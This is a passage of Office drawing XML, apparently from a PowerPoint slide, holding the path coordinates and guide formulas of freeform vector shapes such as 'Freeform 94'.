                      <a:pt x="57" y="109"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="108"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="8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4120" name="Freeform 94"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="425" y="2268"/>
                <a:ext cx="239" cy="148"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 734"/>
                  <a:gd name="T1" fmla="*/ 0 h 454"/>
                  <a:gd name="T2" fmla="*/ 0 w 734"/>
                  <a:gd name="T3" fmla="*/ 0 h 454"/>
                  <a:gd name="T4" fmla="*/ 0 w 734"/>
                  <a:gd name="T5" fmla="*/ 0 h 454"/>
                  <a:gd name="T6" fmla="*/ 0 w 734"/>
                  <a:gd name="T7" fmla="*/ 0 h 454"/>
                  <a:gd name="T8" fmla="*/ 0 w 734"/>
                  <a:gd name="T9" fmla="*/ 0 h 454"/>
                  <a:gd name="T10" fmla="*/ 0 w 734"/>
                  <a:gd name="T11" fmla="*/ 0 h 454"/>
                  <a:gd name="T12" fmla="*/ 0 w 734"/>
                  <a:gd name="T13" fmla="*/ 0 h 454"/>
                  <a:gd name="T14" fmla="*/ 0 w 734"/>
                  <a:gd name="T15" fmla="*/ 0 h 454"/>
                  <a:gd name="T16" fmla="*/ 0 w 734"/>
                  <a:gd name="T17" fmla="*/ 0 h 454"/>
                  <a:gd name="T18" fmla="*/ 0 w 734"/>
                  <a:gd name="T19" fmla="*/ 0 h 454"/>
                  <a:gd name="T20" fmla="*/ 0 w 734"/>
                  <a:gd name="T21" fmla="*/ 0 h 454"/>
                  <a:gd name="T22" fmla="*/ 0 w 734"/>
                  <a:gd name="T23" fmla="*/ 0 h 454"/>
                  <a:gd name="T24" fmla="*/ 0 w 734"/>
                  <a:gd name="T25" fmla="*/ 0 h 454"/>
                  <a:gd name="T26" fmla="*/ 0 w 734"/>
                  <a:gd name="T27" fmla="*/ 0 h 454"/>
                  <a:gd name="T28" fmla="*/ 0 w 734"/>
                  <a:gd name="T29" fmla="*/ 0 h 454"/>
                  <a:gd name="T30" fmla="*/ 0 w 734"/>
                  <a:gd name="T31" fmla="*/ 0 h 454"/>
                  <a:gd name="T32" fmla="*/ 0 w 734"/>
                  <a:gd name="T33" fmla="*/ 0 h 454"/>
                  <a:gd name="T34" fmla="*/ 0 w 734"/>
                  <a:gd name="T35" fmla="*/ 0 h 454"/>
                  <a:gd name="T36" fmla="*/ 0 w 734"/>
                  <a:gd name="T37" fmla="*/ 0 h 454"/>
                  <a:gd name="T38" fmla="*/ 0 w 734"/>
                  <a:gd name="T39" fmla="*/ 0 h 454"/>
                  <a:gd name="T40" fmla="*/ 0 w 734"/>
                  <a:gd name="T41" fmla="*/ 0 h 454"/>
                  <a:gd name="T42" fmla="*/ 0 w 734"/>
                  <a:gd name="T43" fmla="*/ 0 h 454"/>
                  <a:gd name="T44" fmla="*/ 0 w 734"/>
                  <a:gd name="T45" fmla="*/ 0 h 454"/>
                  <a:gd name="T46" fmla="*/ 0 w 734"/>
                  <a:gd name="T47" fmla="*/ 0 h 454"/>
                  <a:gd name="T48" fmla="*/ 0 w 734"/>
                  <a:gd name="T49" fmla="*/ 0 h 454"/>
                  <a:gd name="T50" fmla="*/ 0 w 734"/>
                  <a:gd name="T51" fmla="*/ 0 h 454"/>
                  <a:gd name="T52" fmla="*/ 0 w 734"/>
                  <a:gd name="T53" fmla="*/ 0 h 454"/>
                  <a:gd name="T54" fmla="*/ 0 w 734"/>
                  <a:gd name="T55" fmla="*/ 0 h 454"/>
                  <a:gd name="T56" fmla="*/ 0 w 734"/>
                  <a:gd name="T57" fmla="*/ 0 h 454"/>
                  <a:gd name="T58" fmla="*/ 0 w 734"/>
                  <a:gd name="T59" fmla="*/ 0 h 454"/>
                  <a:gd name="T60" fmla="*/ 0 w 734"/>
                  <a:gd name="T61" fmla="*/ 0 h 454"/>
                  <a:gd name="T62" fmla="*/ 0 w 734"/>
                  <a:gd name="T63" fmla="*/ 0 h 454"/>
                  <a:gd name="T64" fmla="*/ 0 w 734"/>
                  <a:gd name="T65" fmla="*/ 0 h 454"/>
                  <a:gd name="T66" fmla="*/ 0 w 734"/>
                  <a:gd name="T67" fmla="*/ 0 h 454"/>
                  <a:gd name="T68" fmla="*/ 0 w 734"/>
                  <a:gd name="T69" fmla="*/ 0 h 454"/>
                  <a:gd name="T70" fmla="*/ 0 w 734"/>
                  <a:gd name="T71" fmla="*/ 0 h 454"/>
                  <a:gd name="T72" fmla="*/ 0 w 734"/>
                  <a:gd name="T73" fmla="*/ 0 h 454"/>
                  <a:gd name="T74" fmla="*/ 0 w 734"/>
                  <a:gd name="T75" fmla="*/ 0 h 454"/>
                  <a:gd name="T76" fmla="*/ 0 w 734"/>
                  <a:gd name="T77" fmla="*/ 0 h 454"/>
                  <a:gd name="T78" fmla="*/ 0 w 734"/>
                  <a:gd name="T79" fmla="*/ 0 h 454"/>
                  <a:gd name="T80" fmla="*/ 0 w 734"/>
                  <a:gd name="T81" fmla="*/ 0 h 454"/>
                  <a:gd name="T82" fmla="*/ 0 w 734"/>
                  <a:gd name="T83" fmla="*/ 0 h 454"/>
                  <a:gd name="T84" fmla="*/ 0 w 734"/>
                  <a:gd name="T85" fmla="*/ 0 h 454"/>
                  <a:gd name="T86" fmla="*/ 0 w 734"/>
                  <a:gd name="T87" fmla="*/ 0 h 454"/>
                  <a:gd name="T88" fmla="*/ 0 w 734"/>
                  <a:gd name="T89" fmla="*/ 0 h 454"/>
                  <a:gd name="T90" fmla="*/ 0 w 734"/>
                  <a:gd name="T91" fmla="*/ 0 h 454"/>
                  <a:gd name="T92" fmla="*/ 0 w 734"/>
                  <a:gd name="T93" fmla="*/ 0 h 454"/>
                  <a:gd name="T94" fmla="*/ 0 w 734"/>
                  <a:gd name="T95" fmla="*/ 0 h 454"/>
                  <a:gd name="T96" fmla="*/ 0 w 734"/>
                  <a:gd name="T97" fmla="*/ 0 h 454"/>
                  <a:gd name="T98" fmla="*/ 0 w 734"/>
                  <a:gd name="T99" fmla="*/ 0 h 454"/>
                  <a:gd name="T100" fmla="*/ 0 w 734"/>
                  <a:gd name="T101" fmla="*/ 0 h 454"/>
                  <a:gd name="T102" fmla="*/ 0 w 734"/>
                  <a:gd name="T103" fmla="*/ 0 h 454"/>
                  <a:gd name="T104" fmla="*/ 0 w 734"/>
                  <a:gd name="T105" fmla="*/ 0 h 454"/>
                  <a:gd name="T106" fmla="*/ 0 w 734"/>
                  <a:gd name="T107" fmla="*/ 0 h 454"/>
                  <a:gd name="T108" fmla="*/ 0 w 734"/>
                  <a:gd name="T109" fmla="*/ 0 h 454"/>
                  <a:gd name="T110" fmla="*/ 0 w 734"/>
                  <a:gd name="T111" fmla="*/ 0 h 454"/>
                  <a:gd name="T112" fmla="*/ 0 w 734"/>
                  <a:gd name="T113" fmla="*/ 0 h 454"/>
                  <a:gd name="T114" fmla="*/ 0 w 734"/>
                  <a:gd name="T115" fmla="*/ 0 h 454"/>
                  <a:gd name="T116" fmla="*/ 0 w 734"/>
                  <a:gd name="T117" fmla="*/ 0 h 4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34"/>
                  <a:gd name="T178" fmla="*/ 0 h 454"/>
                  <a:gd name="T179" fmla="*/ 734 w 734"/>
                  <a:gd name="T180" fmla="*/ 454 h 45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34" h="454">
                    <a:moveTo>
                      <a:pt x="0" y="395"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="8" y="399"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="406"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="415"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="425"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="435"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="444"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="138" y="450"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="146" y="453"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="151" y="454"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="160" y="454"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="171" y="454"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="182" y="453"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="193" y="453"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="203" y="452"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="211" y="452"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="214" y="450"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="220" y="449"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="233" y="447"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="249" y="444"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="269" y="440"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="287" y="437"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="304" y="434"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="318" y="432"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="326" y="431"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="332" y="431"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="339" y="432"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="348" y="432"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="357" y="433"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="366" y="433"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="377" y="433"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="385" y="433"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="392" y="433"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="399" y="432"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="407" y="430"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="416" y="427"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="425" y="424"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="433" y="421"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="441" y="417"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="449" y="414"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="455" y="411"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="461" y="410"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="467" y="408"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="473" y="407"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="479" y="406"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="486" y="404"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="492" y="403"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="497" y="402"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="500" y="402"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="507" y="398"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="515" y="387"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="521" y="378"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="523" y="372"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="522" y="372"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="517" y="371"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="511" y="370"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="506" y="369"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="499" y="368"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="493" y="366"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="490" y="365"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="488" y="364"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="492" y="362"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="502" y="360"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="515" y="356"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="531" y="353"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="547" y="350"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="560" y="347"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="570" y="345"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="574" y="342"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="573" y="340"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="568" y="337"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="561" y="333"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="554" y="329"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="546" y="325"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="539" y="323"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="535" y="320"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="532" y="319"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="531" y="318"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="531" y="316"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="531" y="314"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="532" y="311"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="538" y="310"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="551" y="310"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="569" y="309"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="590" y="308"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="611" y="307"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="629" y="307"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="644" y="306"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="651" y="306"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="653" y="303"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="651" y="299"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="646" y="293"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="642" y="288"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="643" y="286"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="647" y="284"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="655" y="281"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="667" y="280"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="678" y="278"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="691" y="276"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="704" y="274"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="714" y="272"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="728" y="266"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="734" y="258"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="734" y="250"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="730" y="245"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="727" y="245"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="720" y="246"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="711" y="247"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="700" y="248"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="690" y="249"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="681" y="250"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="675" y="251"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="672" y="251"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="669" y="250"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="666" y="248"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="664" y="246"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="662" y="245"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="664" y="242"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="668" y="239"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="675" y="234"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="682" y="230"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="690" y="224"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="697" y="219"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="702" y="215"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="705" y="212"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="704" y="208"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="699" y="203"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="692" y="200"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="688" y="197"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="684" y="197"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="677" y="197"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="668" y="197"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="657" y="199"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="645" y="200"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="634" y="200"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="624" y="201"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="617" y="201"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="612" y="200"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="611" y="195"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="612" y="192"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="614" y="189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="617" y="187"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="626" y="185"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="636" y="180"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="649" y="176"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="661" y="170"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="673" y="165"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="681" y="162"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="687" y="158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="690" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="689" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="687" y="141"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="684" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="680" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="670" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="658" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="643" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="627" y="139"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="613" y="140"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="602" y="140"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="596" y="141"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="590" y="141"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="584" y="140"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="579" y="138"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="578" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="582" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="590" y="128"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="600" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="614" y="113"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="627" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="637" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="645" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="649" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="645" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="637" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="626" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="613" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="599" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="589" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="581" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="579" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="583" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="589" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="596" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="602" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="609" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="615" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="620" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="621" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="619" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="611" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="600" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="589" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="575" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="562" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="552" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="545" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="544" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="544" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="544" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="545" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="548" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="554" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="562" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="570" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="579" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="586" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="591" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="592" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="590" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="585" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="578" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="571" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="563" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="556" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="549" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="546" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="539" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="524" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="505" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="483" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="459" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="437" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="418" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="406" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="401" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="393" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="384" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="373" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="362" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="353" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="345" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="340" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="349" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="356" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="363" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="370" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="376" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="380" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="388" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="399" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="410" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="422" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="431" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="438" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="441" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="445" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="448" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="450" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="452" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="446" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="434" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="419" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="403" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="386" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="372" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="362" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="357" y="96"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="354" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="350" y="96"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="348" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="349" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="340" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="334" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="328" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="323" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="317" y="96"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="313" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="308" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="302" y="107"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="294" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="287" y="117"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="281" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
